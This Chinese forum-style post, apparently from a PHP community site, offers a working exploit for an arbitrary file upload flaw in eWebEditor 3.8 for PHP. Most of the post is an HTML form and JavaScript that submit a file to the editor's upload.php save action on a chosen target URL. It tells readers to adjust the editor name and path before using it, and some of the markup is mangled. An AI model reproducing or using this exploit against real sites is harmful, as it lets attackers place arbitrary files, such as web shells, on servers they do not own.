当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

ewebeditorPHP3.8版本上传任意文件0day

PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。EXP如下:titleeWebeditoR3.8forphp任意文件上EXPtitleformactionmethodpostenctypemultipartform-dataINPUTTYPE

PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似

听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。

EXP如下:

eWebeditoR3.8 for <u>php</u>任意文件上EXP
rm action="" method=post enctype="multipart/form-data"> 
 
URL:ext name=url value="http://www.tmdsb.com/ewebeditor/" size=100>
file:
submit onclick=fsubmit()>
《script》 function fsubmit(){ form = document.forms[0]; form.action = form.url.value+'php/upload.php?action=save&type=FILE&style=toby57&language=en'; alert(form.action); form.submit(); } 《script》

用的时候注意修改里面ewebeditor的名称还有路径。

吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有